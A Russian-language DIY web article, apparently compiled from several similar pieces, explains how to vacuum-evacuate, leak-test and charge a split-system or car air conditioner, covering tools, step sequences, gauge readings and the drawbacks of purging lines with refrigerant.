38 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Вакуумирование кондиционера своими руками

Что такое вакуумирование кондиционера и как его делать?

Вакуумирование кондиционера – это важный процесс, который обуславливает безотказную и долговечную работу устройства. Как известно, по окончании монтажа в сплит-системе находятся остатки воздуха и влаги, которые требуется удалить.

Подготовка сплит-системы к работе

Во время установки кондиционера его оба блока, внешний и внутренний соединяются между собой двумя медными трубами, которые образуют систему для циркуляции хладагента в холодильном контуре системы.

По окончании монтажа фреоновой трассы, то есть труб, в системе находиться воздух и остаточная влага. При взаимодействии фреона с воздухов в трубах образуются, влияние которых оказывает пагубное воздействие на работу оборудования.

От правильного монтажа и вакуумирования трассы зависит долгий срок службы кондиционера

Осуществление пуско-наладочных работ

Для проведения качественных работ следует запастись специальными инструментами:

  1. Насосом для кондиционеров (вакуумным).
  2. Станцией со шлангами и манометрами.
  3. Баллоном с хладагентом, подходящим для сплит-системы.
  4. Набором ключей и отверток.

Подготовив все необходимые инструменты, рассмотрим боле подробно сам процесс. Первым делом необходимо осуществить подсоединение вакуумного насоса используя шланги коллектора манометрического к наружному крану кондиционера. Включаем насос для работы на 10-20 минут, в зависимости от мощности подключенного устройства. За это время насос должен выкачать все остатки воздуха и влаги изнутри и образовать глубокий вакуум.

Контроль за процессом вакуумирования осуществляется посредством снятия показаний с манометра. При достижении необходимого показателя в системе насос самостоятельно отключается, и продолжается наблюдение за внутренним состоянием системы.

Если в течении 30 минут внутреннее давление не изменяется, то процесс прошел удачно. В противном случае необходимо искать и ликвидировать утечку.

Причины возникновения утечек:

  1. Слабая или сильная затяжка гайки.
  2. Залом одной из медных трубок.
  3. Вальцевание низкого качества.

Удостоверившись в достижении вакуума можно приступать к следующему этапу – запуску фреона в систему. Для запуска фреона необходимо отсоединить насос и открыть фреоновые краны шестигранным ключом. В результате таких действий появляется шипение, свидетельствующее о заполнение фреоновым контуром оборудования.

По окончанию процесса оборудование можно считать полностью готовым к первому запуску. Во время проведения тестирования оборудования проверке подлежат все возможные режимы на соответствие их работы о заявленных характеристиках.

Схема соединений для вакуумирования и заправки кондиционера

Вакуумирование оборудования своими руками

Для того что б вакуумировать кондиционер самостоятельно требуется отсоединить один из шлангов коллектора на выбор с заправочным клапаном, а второй пользуясь вакуумным насосом для кондиционеров. По окончании подсоединений следует привести насос в действие и открыть кран на коллекторе. Таким образом, насос извлечет всю влагу, мелкие частицы и воздух из оборудования.

Проработав 20-30 минут, отключите систему и следите за стрелкой, которая стоит на 0 или 1. Если местоположение стрелки не изменилось, то система полностью герметична, в противном случае необходимо искать поломку.

Очень важно соблюдать элементарные правила пользования кондиционером

Для обнаружения поломки в системе первым делом проверяем все соединения, используя мыльный раствор. По окончании проверки и регулировки системы в необходимых местах повторите все действия заново. Если повторная операция привела к тому же результату – необходимо исследовать вальцовку.

Самым больным местом прибора являются гайки (недотянутые или изрядно сорванные). В таком случае необходима заняться обратным процессом – перекачке фреона в кондиционер. Для этого следует подсоединить коллектор к клапану и запустить сплит-систему на холод и закрыть кран на тонкой трубе. Как только возникнет разряжение – закройте кран на толстой трубе.

По окончании работы необходимо провести все действия заново, начиная с устранения воздуха и жидкости в системе.

Если вы добились герметичности системы, то следующим этапом работы будет запуск фреона. Для этого следует открутить 2 клапана, толстой и тонкой трубы, используя шестигранный ключ. После отсоединения коллектора можно осуществить тестирование устройства и насладиться результатом стараний.

Как видим самостоятельное вакуумирование кондиционера — это вполне реальный процесс для простого человека.

Чего стоит остерегаться

Многие малограмотные специалисты, то ли по причине необразованности, толи из-за собственной лени, игнорируют вакуумирование сплит-системы, а вместо этого выгоняют часть фреона для вытеснения воздуха. Такие действия строго запрещены заводом. Так как могут привести к быстрой поломке и выходу из строя дорогостоящей системы.

Если у вас оборудование находиться на гарантии, то хорошо подумайте прежде чем самостоятельно лезть в систему. после постороннего вмешательства, мастера сервисного обслуживания снимают с себя всю ответственность.

Что нужно знать о вакуумировании кондиционера

Эффективная, бесперебойная работа бытового охлаждающего оборудования зависит не только от технического, конструктивного исполнения модели, качественной сборки на заводе-изготовителе и т.д. Влияние оказывает правильно выполненный монтаж с соблюдением правил, которые содержит инструкция оборудования. Одно из них – вакуумирование кондиционера перед первоначальным запуском системы.

Необходимо ли вакуумирование?

Бытовая сплит-система, независимо от конструктивного исполнения внутреннего блока, оснащена охлаждающей фреоновой магистралью, функционирование которой обеспечивает снижение температуры внутри помещения. В ее состав входят два теплообменных элемента (конденсатор и испаритель), медные трубы, компрессор, терморегулирующий вентиль, хладагент, компрессорное масло.

Фреоновый контур обязательно должен быть максимально герметичен, чтобы внутрь не попадал воздух, влага, мелкодисперсные инородные частицы. Их включение в охлаждающее вещество со временем приведет к поломке оборудования:

  • Воздух вызывает повышение давления внутри контура, компрессор будет работать с постоянно увеличенной нагрузкой, что приведет к быстрому износу механизмов.
  • Вода вступает в химическую реакцию с компрессорным маслом (синтетическим, минеральным), в результате которой образуются органические, неорганические кислоты. Они оказывают губительное действие на детали контура, сплит выходит из строя намного быстрее.
  • Под действием влаги внутренняя поверхность контура корродирует, образующиеся частицы ржавчины циркулируют вместе с хладагентом, попадают в компрессор, что может привести его к поломке, полной замене.

Чтобы исключить эти и другие неприятные последствия, охлаждающий контур должен герметичным. Это достигается за счет плотного соединения всех элементов, качественной вальцовки труб, удаления воды и воздуха при помощи вакуумного насоса. При этом, гарантийное обслуживание многих сплит-систем невозможно без вакуумирования, которое предусматривается производителем.

Оборудование для вакуумирования и заправки

Если планируется самостоятельная установка кондиционера либо дозаправка хладагентом нужно приобрести оборудование для вакуумирования и заправки. Перечень необходимых приборов:

  • насос для вакуумирования;
  • коллектор с манометром (возможно использование цифрового) или вакууметром;
  • течеискатель;
  • вентильный ключ;
  • набор шлангов;
  • тэн для подогрева цилиндра;
  • устройство для сбора хладагента;
  • вентили для манометра, шлангов;
  • зарядная станция.

Насос для вакуумирования удаляет проникшие в контур влагу и воздух путем создания внутри контура области разреженного давления. Низкое давление способствует снижению точки кипения воды. Виды:

  • низковакуумные (0,1 мБар);
  • высоковакуумные (0,02 мБар).

Необходимо помнить, что у каждого устройства есть граница остаточного давления, после которой оно перестает удалять воздух. Данный показатель отличается в зависимости от модели, ее потребляемой мощности, производительности.

Как долго делать вакуумирование?

Длительность процесса зависит от возможностей вакуумного оборудования. Показатель степени вакуумации – мощность техники, одноступенчатые вакууматоры менее мощные, подходят для соответствующих сплит-систем. Акт герметизации может длиться около 30 мин.

Двухступенчатый насос – более мощное оборудование, может достичь вакуума даже за минуту. Последующие 15-20 мин необходимы для проверки герметичности системы.

Проследить уровень давления можно с помощью монометрического коллектора, либо вакууматора. Более точные показатели герметичности контура достигаются методом опрессовки высоким давлением (40 Бар).

Вакуумирование и бытовая сплит-система

Самостоятельная установка кондиционера кроме технических, строительных моментов, включает также обязательный этап герметизации охлаждающего контура на завершающем этапе монтажа. Проводится в данной последовательности:

  1. коллектор с манометром подключается с помощью шлангов к сервисным портам внешнего блока;
  2. третий шланг предназначен для насоса, соединяется с ним;
  3. запуск вакуумного прибора для удаления влаги, воздуха;
  4. стрелка манометра должна опуститься до отрицательного значения на шкале, которое обозначает границу остаточного давления прибора.
  5. процесс вакуумирования остается на этом уровне примерно 20-30 мин;
  6. если значение не меняется, значит, система герметична. Теперь можно перекрыть вентиль на коллекторе;
  7. отключается вакуумный прибор;
  8. открываются порты на наружном модуле, хладагент запускается в систему;
  9. коллекторные шланги отсоединяются;
  • сплит-система тестируется во всех режимах, необходимо показания сверять с указанными в инструкции. Если они соответствуют, установка и герметизация проведены верно.

Важно:

  • Отключение насоса можно производить только после перекрытия манометрического вентиля. Иначе насосное масло по шлангам попадет в область низкого давления внутри контура.
  • Когда стрелка манометра выходит из области отрицательного значения, значит, контур не герметичен, необходимо искать место утечки фреона методом опрессовки высоким давлением.

Вакуумирование кондиционера автомобиля

Самостоятельно производится и заправка автокондиционера с использованием соответствующего набора инструментов, оборудования. Процесс также требует соблюдения параметров герметизации системы. Если давление будет превышать 285 кПа, компрессорный механизм выйдет из строя. Для проверки давления и заправки автомобильных кондиционеров необходимо:

  • хладагент в баллоне;
  • метрологическая станция;
  • переходная муфта для подключения манометра и шланга;
  • шланги.

Процесс герметизации и заправки автомобильных кондиционеров:

  1. подсоединить вентиль к баллону с хладагентом, предварительно сделав прокол в специальной плоскости;
  2. при помощи муфты и тройника подключить к баллону манометр, шланг;
  3. к свободному концу шланга присоединить метрологическую станцию;
  4. к станции подключается второй шланг. Установка для вакуумирования и дозаправки готова;
  5. определить патрубок низкого давления, идущего в систему кондиционирования, очистить его, заправочный штуцер, чтобы исключить попадание грязи внутрь контура;
  6. к штуцеру присоединить шланг от метрологической станции;
  7. после запустили двигатель на 1500 оборотов для прокачки фреона по магистрали;
  8. включить рециркуляцию воздуха в салоне на максимальную величину;
  9. баллон располагается дном вверх, в этом положении понемногу нужно открывать вентиль для заправки;
  • отслеживать показания на манометре, в окошке фильтра-осушителя жидкость должна быть прозрачной, без пузырьков;
  • заправка завершается, когда в салон идет охлажденный воздух, а шланг возле штуцера низкого давления очень холодный.

Вакуумирование кондиционера своими руками

Самостоятельная установка кондиционера проводится с обязательной герметизацией всей системы вакуумным насосом (процесс описан выше) в соответствии с правилами технической документации. Если кондиционер уже установили и требуется его дозаправка, насос также необходим. После заполнения трассы хладагентом, производится вакуумирование.

Если насоса нет, можно попробовать заменить его мощным компрессором от холодильника. По отзывам на форумах, такая установка для вакуумирования и герметизации вполне действенна.

Решая вопрос, нужно ли проводить удаление влаги и воздуха из фреонового контура, некоторые владельцы сплит-систем считают, что продувка может быть достаточной и вакууумирование проводить не обязательно. При этом часть фреона спускается из системы, чтобы вывести излишки воздуха, влаги. Этого делать нельзя, так как производитель заправляет внешний блок необходимым количеством хладагента. Такая самостоятельная установка кондиционера только навредит устройству.

Вакуумирование системы кондиционирования своими руками

После покупки климатического оборудования важным моментом является монтаж сплит системы. От того, насколько качественно будет проведена работа, зависит, насколько долго и безотказно устройство будет эксплуатироваться. Поэтому сразу уточняются этапы монтажа – установка внутреннего блока, нюансы монтажа внешнего, вакуумирование системы кондиционирования.

Подключение, вакуумирование и замена радиатора кондиционера своими руками – это достаточно сложные процедуры, требующие специальных навыков и знаний.

Подключение кондиционера

Перед подключением кондиционера следует подготовить необходимый инструмент, навесить наружный и внутренний блоки. Последовательность действий:

  • Для прокладки труботрассы и электрических кабелей в стене между блоками сверлят отверстия диаметром около 6 сантиметров.
  • В качестве трубопроводов используют медные трубки, характеристики которых указаны в мануале. Трубы нарезают специальным инструментом, исключающим появление металлической стружки, развальцовывают и сгибают с помощью трубогиба.
  • Трубу подсоединяют к месту крепления, предварительно обработанному герметиком.
  • Производят вакуумирование.
  • Открывают сервисный клапан.
  • Подсоединяют электрические провода.
  • Монтируют дренажный шланг.
  • Все трубопроводы и дренажную трубку перематывают утеплительной лентой.

Когда необходимо вакуумирование

При монтаже оба блока соединяются между собой медными трубами для циркуляции хладагента. Это и есть контур кондиционера. После прокладки медной магистрали все трубы герметично соединяются и затягиваются во избежание попадания атмосферного воздуха внутрь. Даже при большом старании удалить воздух из труб продуванием, полностью избавиться от него не удастся.

Вакуумирование кондиционера – обязательная процедура как для бытовых устройств, где длина магистрали не превышает 2 метров, так и для офисных или промышленных инсталляций, где длина фреоновых труб может достигать десятков метров.

Для чего это нужно:

  • пары воздуха растворяются в масле, которое отвечает за смазку деталей компрессора, это приводит к изменению характеристик смазочного материала и оно хуже выполняет свои функции: не образует плотную пленку на поверхности трущихся деталей; механизм быстрее изнашивается и повышается риск заклинивания компрессора;
  • влага изменяет химические показатели охлаждающей жидкости, что грозит снижением производительности кондиционера, на контуре будут заметны признаки обмерзания.

Вакуумирование проводится перед первым включением, чтобы не допустить контакт масла с остатками воздуха или воды.

Оборудование для вакуумирования и дозаправки

Для работы нужны следующие инструменты и приборы:

  • Вакуумная станция для кондиционеров. Перед заправкой хладагента подключается к контуру и осушает его. Манометры на приборе показывают уровень вакуума. В работе мастера используют двухступенчатые модели, которые экономичны в плане расхода электроэнергии, просты в монтаже. Хорошую очистку дают гетерионные вакууматоры для кондиционеров, но редко применяются, так как стоят дорого.
  • Манометрический коллектор.
  • Набор отверток и ключей для работы со штуцерами.
  • Баллон с фреоном для последующей заправки.

Самым важным прибором является насос, который будет герметизировать трубопровод. Удобство в работе создает вес устройства – чем оно легче, тем проще. Модели, которые имеют резиновую опору для снижения уровня вибраций, более удобны в эксплуатации.

При работе насос расходует масло, поэтому индикация его уровня – полезная функция для человека, который постоянно работает с прибором.

Для удаления паров должен быть предусмотрен клапан, а также комплект штуцеров, предназначенный для внешнего блока, через которые происходит эвакуация воздуха.

На рынке лидирует техника немецких, американских, швейцарских производителей оборудования для климатической техники различного ценового уровня. Некоторые китайские фирмы поставляют продукцию, которая не уступает по качеству европейским аналогам, но гораздо дешевле.

Профессиональные ремонтники используют большие баллоны с хладагеном, так как часто проводят монтаж, заправку и дозаправку трубопроводов клиентов сервиса. Для одноразового применения достаточно купить небольшой объем фреона, чтобы не переплачивать.

Подготовка сплит системы

Перед началом работы вакуумного насоса его подключают через манометрическую станцию к крану наружного блока кондиционера. Манометрическая станция нужна для контроля уровня вакуума, после достижения которого прибор отключается. Некоторое время после окончания процесса вакуумирования мастер наблюдает за показателями приборов. Если они не меняются, проводится работа по заполнению контура хладагентом – система герметична, ненужные пары удалены. В случае, если показания манометра меняются, магистраль проверяется на трещины – фреон будет вытекать из труб, что потребует ремонта вскоре после монтажа.

Перед заполнением контура охлаждающей жидкостью насос отсоединяют. При помощи ключа-шестигранника открывают фреоновые краны, жидкость поступает в контур кондиционера, издавая шипящий звук. Сколько хладагента необходимо заправить и какого типа, описано в инструкции производителя.

После заполнения труб хладагентом за показаниями манометра наблюдают полчаса. За это время не должны меняться показатели давления. В противном случае ищут протечку и заново вакуумируют и заполняют магистраль. Утечки возникают из-за слабого или очень сильного зажима гаек на штуцерах, плохой пайки или развальцовки медных труб. Заломы на трубах также могут быть причиной утечки фреона, так как излишнее натяжение металла образует трещины.

Как долго идет процесс вакуумирования

Процесс вакуумирования кондиционера длится от 10 до 20 минут. Это зависит от мощности сплит системы, толщины труб. Для промышленных или офисных систем вакуумирование и заправка фреоном длится дольше, так как длина трубопровода достигает нескольких десятков, а иногда и сотен метров. На таких объектах наблюдение за показателями глубины вакуума после герметизации длится около часа. Иногда требуется повторное включение устройства.

Когда показатели в трубопроводе перестают меняться в определенный промежуток времени, можно переходить к заполнению их фреоном.

Вакуумирование кондиционера своими руками

Чтобы вакуумировать кондиционер самостоятельно, необходимо запастись шлангами низкого и высокого давления.

Конец шланга без выступа подсоединяется к насосу. Противоположный конец, снабженный штырьком, крепится к золотнику газового порта, после чего насос запускается на 10 минут. По окончании вакуумирования необходимо приоткрыть клапан для запуска фреона и тут же закрыть его, отсоединив шланг. Небольшое количество хладагента будет потеряно, но это нормально, потеря возможна и при замене радиатора кондиционера.

Во время продувки трасс длиной больше 6 метров метод вакуумирования используется для сохранения фреона, который в противном случае будет выпущен, а дозаправка не представляется возможной.

После выкачивания воздуха и влаги из трубопровода следует отвинтить клапаны жидкости и газа до упора (все семь оборотов). Соединения обрабатываются мыльной пеной для выявления возможных утечек.

Вакуумирование и проверка кондиционера

В итоге, после всех этапов установки сплит-системы нам остаётся запустить фреон в кондиционер и проверить его работу.

Вакуумирование холодильного контура

Внешний блок кондиционера идёт с завода заправленным, то есть в нём находится фреон в необходимом количестве. Не дают ему выйти наружу закрытые трёхходовые клапаны.

После монтажа у нас получается система состоящая из внутреннего блока и соединительных трубок, заполненных атмосферным воздухом с содержащимися в нём примесями и влагой.

Для нормальной работы нам необходимо удалить воздух и влагу из системы, после чего открыть вентили, запустив фреон.

Процесс вакуумирования

  • Подсоединяем манометрический коллектор к вентилю на кондиционере (шланг низкого давления-синий)

  • Подсоединяем заправочный шланг к вакуумному насосу (жёлтый)

  • Открываем вентиль низкого давления
  • Включаем вакуумный насос
  • После окончания процесса закрываем вентиль на манометрическом коллекторе
  • Только после этого выключаем насос
  • Запускаем фреон в контур открывая вентили на кондиционере шестигранником (оба)

Время вакуумирования

Для контроля степени разрежённости в системе существует прибор — вакууметр, шкала которого проградуирована в мБар — хорошие вакуумники изначально комплектуются вакууметрами, но можно использовать и отдельные, например электронные.

Некоторые монтажники ориентируются по давлению манометра — как только давление падает ниже нуля, они прекращают вакуумирование, считая что воздух удалился и можно прекращать процесс.

Но это не правильно. В любом воздухе содержится влага — при вакуумировании она испаряется, поэтому для кондиционеров 7 Btu/h время вакуумации не должно быть меньше 15 минут (зависит от производительности самого насоса), для более мощных систем, соответственно больше.

Выбор вакуумного насоса

Для разных целей необходимо выбирать разное оборудовафние, к примеру для монтажа бытовых кондиционеров понадобится насос с небольшой производительностью, которого вполне хватит для небольшой трассы. А при установке промышленных, VRV систем уже необходимы насосы с высокой производительностью и мощностью.

Характеристики на которые необходимо обратить внимание при подборе и покупке вакууматора:

  • Производительность, л/ч
  • Остаточное давление, Па
  • Мощность двигателя, Вт

От производительности зависит скорость откачки из холодильной системы, указывается в литрах в час.

Остаточное давление характеризует «качество вакуумации», чем меньше это значение, тем лучше, измеряется в Паскалях или мили Барах.

От мощности электродвигателя зависит время непрерывной работы насоса, при длинных трассах в ВРВ системах этот параметр имеет большое значение.

Это самые основные параметры, существует ещё ряд параметров, такие как, количество ступеней, тип насоса — масляный, безмасляный, количество оборотов двигателя и прочие.

«Продувка фреоном»

Многие монтажники практикуют такую процедуру — выгоняют воздух открыв вентиль и открутив одну из гаек, из под неё выходит воздух,после чего её закручивают.

После такого монтажа влага остаётся в системе,последствия этого — окисление медных трубок, повреждение компрессора, забивание ТРВ влагой. А самое главное — значительное сокращение срока службы, таким образом можно загубить любой кондиционер, даже самый дорогой.

Дозаправка фреоном

Кондиционер заправлен на заводе хладагентом в расчёте на длину трассы приблизительно до 5 метров, при большей длине его придётся дозаправлять.

Точное количество указано в инструкции по монтажу и составляет около 5-20 грамм на метр дополнительной трассы, в зависимости от мощности кондиционера.

Необходимо высчитать количество недостающего фреона и заправить его методом «по массе».

В противном случае будет потеря холодильной мощности.

Проверка кондиционера

После запуска фреона в контур включаем кондиционер на охлаждение и измеряем температуру на выходе — она должна быть не ниже 0 0 С.

Если температура ниже нуля, это говорит о недостаче фреона, который необходимо добавить (естественно, это при соблюдении рабочего температурного диапазона на улице конкретно для данного кондиционера).

После можно включить кондиционер в режим обогрева и проверить его работоспособность в этом режиме.

Проверка дренажа

  • Открываем крышку внутреннего блока
  • Снимаем фильтры
  • Аккуратно наливаем воду из бутылки в поддон кондиционера (можно лить прям на испаритель)
  • Убеждаемся что вода свободно выливается из дренажного шланга на улицу

Вот и всё, мы завершили установку кондиционера!

Осталось только рассмотреть некоторые нюансы — вальцевание и пайку трубок, удаление конденсата дренажной помпой, установку защитных электрических устройств.

Вакуумирование кондиционера своими руками

Вакуумирование кондиционера – это заключительный и один их важнейших этапов его установки. Если вакуумирование выполнено неправильно, то снизится не только качество работы оборудования, но и срок его эксплуатации станет меньше. Что же такое вакуумирование? Вакуумированием называют процесс удаления воздуха из труб, ведущих во внутренний блок кондиционера, а также из самого внутреннего блока сплит-системы. Помните о том, воздух содержит водяные пары, которые при вступлении в контакт с маслом, используемым для смазки компрессора, быстро в нем растворятся, то компрессор может быстро прийти в негодность, а его смазочные качества существенно снизятся. А между тем, компрессор – это самый дорогой элемент во всей системе. Учитывайте это перед тем, как производить вакуумирование кондиционера своими руками.

Процесс вакуумирования

Как известно, внутренний и наружный блоки кондиционера соединены друг с другом двумя медными трубками. Так как по ним циркулирует хладагент, то в трубках не должно быть ничего постороннего. А все стыковочные места должны быть надежно герметизированы. Бывает, что вакуумирование вообще не проводится. Вместо этого применяют хладагент, который пускают через систему для вытеснения из нее воздуха.

Никто не задумывается, что при таком подходе нет гарантии того, что воздух будет вытеснен полностью. А значит, есть риск, что в фреон попадет воздух. Что непременно приведет к обмерзанию некоторых элементов контура. И тогда понадобится полное освобождение системы от фреона и заправка его новой порцией хладагента, что сулит дополнительные и весьма существенные траты.

Вакуумирование предполагает удаление не только воздуха, но также и влаги. Малейшая капля влаги, оставшись внутри, может привести к порче хладагента и соответственно всей установки. Легче всего процедуру выполнить, используя вакуумный насос для кондиционеров, который специально предназначен для выкачки воздуха и влаги из холодильного контура. Но перед тем как его запустить, нужно убедиться, что трубки герметично соединены с патрубками внутреннего блока и с вентилями на наружном блоке. Далее к внешнего блока подключается насос, который откачает весь воздух их трассы, образовав там глубокий вакуум. Длительность процедуры зависит от длины трубопровода и от мощности самого кондиционера.

Как правильно выбрать вакуумный насос

Выбор модели вакуумного насоса зависит от типа оборудования, для которого его собираются применять. Например, если кондиционер бытовой с небольшой трассой, то вполне подойдет насос с небольшой производительностью. Для промышленных систем нужен насос с высокой мощностью и производительностью. При выборе насоса лучше ориентироваться на следующие его характеристики:

  • производительность,
  • мощность двигателя,
  • остаточное давление.

Такой показатель, как производительность, влияет на то, с какой скоростью будет производиться откачка воздуха из системы. Характеристики мощности двигателя подскажу, как долго насос сможет проработать в режиме нон-стоп. Если вакуумируют сплит-систему промышленного назначения, где трассы достаточно длинные, то данный показатель имеет ключевое значение. Что касается остаточного давления, то данный показатель влияет на качество процесса вакуумирования. Чем ниже показатель, тем лучше проходит процесс.

Принцип работы вакуумного насоса

Вакуумный насос создает разряжение, за счет чего температура кипения воды снижается и становится ниже температуры воздуха в окружающей среде. Таким образом, оставшаяся в трубопроводе вода испаряется и легко выводится вместе с остатками воздуха.

Очень часто специалисты, занимающиеся сервисным обслуживанием сплит-систем, отказываются делать вакуумирование, ссылаясь на то, что для данной процедуры требуется специальное оборудование и очень много времени. Они настаивают, что удалить влагу и лишний воздух можно при помощи продувания фреоном, который находится во внешнем блоке кондиционера. К сожалению, такой метод не позволяет полностью удалить остатки воздуха и влаги из сплит-системы, немного все равно останется. Еще один недостаток процедуры продувки фреоном – уменьшение количества хладагента в системе. А это уже причины для появления дефектов в работе устройства, снижения эффективности и угрозы поломки оборудования.

Специалисты по ремонту кондиционеров, которые практикуют процедуру вакуумирования, при проведении работ применяют манометрический коллектор с набором шлангов и манометрами. Но они не учитывают того, что обычный манометр не отображает все процессы, которые происходят во время процедуры вакуумирования.

Для получения более точных результатов лучше использовать вакуумметр. Он покажет не только то, насколько эффективно протекает процесс вакуумирования, но и момент, когда система будет готова к заправке хладагентом. Производя самостоятельное вакуумирование кондиционера, следите, чтобы стрелка вакуумметра плавно двигалась по шкале к цифре «0». По достижении стрелкой отметки «0» необходимо закрутить вентиль и отключить вакуумный насос. При этом важно следить за отклонениями стрелки вакуумметра еще в течение получаса после проведения процедуры.

Показания вакуумметра

Возможны несколько вариантов поведения стрелки вакуумметра после выключения прибора:

  1. Показания свидетельствуют о повышении давления, при этом стрелка снова падает до значения 1 атм, которое было до начала процесса вакуумирования.
  2. Показания опять же свидетельствуют о повышении давления, но стрелка, падая, не достигает отметки 1 атм.
  3. Стрелка не меняет своего положения на протяжении более пятнадцати минут, показывая значение «0».

Что это может значить? В первом варианте, когда стрелка достигла значения 1 атм при повышенном давлении, необходимо понимать, что в системе скорее всего присутствует течь и нужно ее как можно быстрее устранить. Во втором варианте, где стрелка не достигает значения 1 атм. при том же повышенном давлении означает, что необходимо продолжить процесс вакуумирования, поскольку в системе еще осталась влага. Последний вариант свидетельствует о положительном результате операции, т.е. что вакуумирование прошло хорошо, а влага и воздух полностью удалены из системы.

Бывают случаи, когда отсутствие герметичности выявляется намного позже, когда в системе уже создано рабочее давление. Поэтому после проверки на вакуум лучше всего дополнительно провести еще и проверку на герметичность под давлением.

Как проверить систему на утечку

Перед тем, как проводить проверку на утечку, плотно закрутите запорные вентили. Проведите вакуумирование и проверьте уровень давления. Оно не должно увеличиваться на протяжении одной минуты. Введите в систему азот до давления, не превышающего 4 МПа. Чтобы убедиться, что трубы не дают утечку, нанесите на места их соединений мыльный раствор. Удалите азот из системы. Повторно проведите вакуумирование и измерьте еще раз давление. После того, как давление вакуума перестанет расти, можно будет отвинтить запорные вентили.

Если существует риск попадания влаги в систему, то нужно после вакуумирования в течение двух часов повести надув системы азотом, не превышая показания в 0,05 МПа. Влага может попасть в систему при монтаже, например, если кондиционер устанавливали в дождливую погоду. После азота еще раз в течение часа проведите вакуумирование, доведя давление до 100,7 кПа. Если на протяжении двух часов давление не достигает вышеуказанной отметки, то необходимо повторить процедуру с надувов и вакуумированием еще раз. После окончания процедуры, в течение часа проконтролируйте и убедитесь, что давление не увеличивается.

После того, как вы откачали весь воздух, может произойти такое, что давление хладагента перестанет подниматься. Возможные причины этого состоят в том, что расширительный клапан контура внешнего блока может быть закрыт. Но данное обстоятельство не является препятствием для запуска блока.

Если вы решили провести вакуумирование кондиционера своими руками, то очень важно задействовать в этой процедуре всю систему, включая соединительные трубки и трубки теплообменника. Там также может находиться воздух. И, конечно же, нужно проследить, чтобы воздух не смешивался с хладагентом во время работы кондиционера.

Вакуумирование кондиционеров: как своими руками починить систему

Насколько эффективна будет работа новой системы кондиционирования, зависит от множества факторов. К ним относится имя производителя, качество сборки, соблюдение правил установки и последующей эксплуатации. Но не всем покупателям кондиционеров известно, что залогом их долгой бесперебойной работы также является вакуумирование.

В конструкции любого бытового кондиционера имеется фреоновая магистраль, выполняющая охлаждающую функцию. За счёт её работы снижается температура воздуха в помещении. Блок состоит из следующих элементов:

  • конденсатора;
  • испарителя;
  • компрессора;
  • медных труб;
  • терморегулирующего вентиля;
  • хладагента;
  • компрессорного масла.

В совокупности они образуют единую систему, обязательным условием работы которой является полная герметичность. Её нарушение и попавшие внутрь жидкость, воздух и мелкие инородные частицы чреваты разными поломками.

Попавший внутрь воздух увеличит давление внутри магистрали, постоянная нагрузка на компрессор во время его работы возрастёт, износ деталей ускорится.

Вода, смешавшись с компрессорным маслом, запустит химическую реакцию, продуктами которой станут кислоты органического или неорганического происхождения. Их воздействие на элементы кондиционера даст негативный эффект.

Действие воды также опасно образованием ржавчины на внутренней поверхности корпуса. Частички этой ржавчины вместе с хладагентом начнут распространяться по системе, попадут в компрессор, из-за чего тот выйдет из строя.

Избежать этих проблем поможет вакуумирование системы кондиционирования. О необходимости такой процедуры сообщается во всех инструкциях по установке охлаждающего оборудования. Многие производители отказываются осуществлять гарантийное обслуживание кондиционеров, если перед их первым запуском не была проведена вакуумация.

Обычно процедуру проводят квалифицированные специалисты, которые занимаются установкой бытовых систем охлаждения. Но при желании и достаточном опыте можно осуществить вакуумирование кондиционера своими руками. Для этого понадобится:

  • насос;
  • коллектор с вакуумметром или манометром;
  • набор шлангов;
  • течеискатель;
  • вентильный ключ;
  • вентили для шлангов и манометра;
  • нагревательный элемент для подогрева цилиндра;
  • устройство для сбора хладагента;
  • зарядная станция.

Насос для вакуумации убирает воздух и воду из охлаждающей магистрали, создавая внутри области разреженного давления. В процессе использования насоса следует учитывать, что он имеет границу остаточного давления, достигнув которой перестаёт удалять воздух.

Для того чтобы вакуумировать кондиционер перед его первым использованием, потребуется совершить ряд действий:

  1. 1. С помощью шлангов соединить коллектор с внешним блоком через сервисные порты.
  2. 2. Присоединить шланг, предназначающийся для насоса.
  3. 3. Запустить вакуумное оборудование.
  4. 4. Дождаться, когда стрелка манометра опуститься до отрицательной величины, обозначающей границу остаточного давления.

Если стрелка в течение 20−30 минут не изменит своего положения, это означает, что вакуумирование завершено, система полностью герметична, можно отключать прибор, предварительно перекрыв вентиль манометра. Если этого не сделать, через шланги насосное масло может протечь внутрь охлаждающей системы кондиционера. После отключения насоса нужно открыть порты наружного модуля и запустить хладагент в контур, затем отсоединить шланги коллектора.

Если стрелка манометра поднимается выше отрицательных значений, это свидетельствует о недостаточной герметичности и утечке фреона. Чтобы обнаружить негерметичный участок системы, придётся прибегнуть к опрессовке высоким давлением.

Длительность процедуры определяется мощностью насосного оборудования. Одноступенчатой модели для этого потребуется минимум полчаса, в то время как двухступенчатая справится за минуту. Дополнительно придётся потратить около 15 минут на проверку.

Кондиционер необходимо тестировать на наличие утечек во всех режимах работы, постоянно сверяя имеющиеся показатели с теми, которые рекомендованы производителем.

Хладагент — основной компонент, с помощью которого обеспечивается эффективное функционирование охлаждающей установки. После того как вакуумация кондиционера будет успешно проведена, требуется рассчитать необходимый объём хладагента и запустить его в систему. Сделать это можно несколькими методами.

Самый простой способ подразумевает заправку по массе. Используя специальные весы, нужно взвесить баллон, проверить количество охлаждающего вещества, заправить газом нужный объём. Если количество хладагента известно, можно применить заправочный цилиндр, гарантирующий быструю и точную заправку. С его помощью можно заполнить баллон, а из баллона — весь контур. Нужно лишь иметь в виду, что цилиндр имеет небольшой размер, рассчитанный не более чем на 4 кг.

Другой способ заправки — по давлению — может применяться только при наличии точных сведений от производителя. Заполнение системы происходит в несколько этапов путем присоединения баллона с охлаждающим веществом с помощью манометрического коллектора. После закачивания небольшой порции хладагента необходимо обязательно сверять показатели прибора с табличными данными, затем начинать закачивание новой порции вещества. Так следует делать, пока показатели манометра не совпадут с табличными.

Для заполнения системы иногда может применяться смотровое стекло, с помощью которого удобно отслеживать состояние хладагента. Наличие пузырьков свидетельствует о том, что контур заполнен не до конца. Как только они исчезнут, заправку можно завершать. Добавлять вещество также следует небольшими порциями, добиваясь стабилизации давления.

Каждый из способов заправки кондиционирующей системы имеет свои особенности. Необходимо выбирать оптимальный вариант, учитывая его удобство и безопасность.

На производстве заправка оборудования хладагентом осуществляется из расчёта 5 м длины магистрали. Если трасса имеет большую длину, во избежание потери мощности агрегат придётся дозаправлять. О том, нужно это делать или нет, можно судить, запустив прибор в режиме охлаждения и измерив температуру на выходе. Отрицательное значение свидетельствует о необходимости дозаправки. Аналогично проводят проверку в режиме обогрева.

Ссылка на основную публикацию
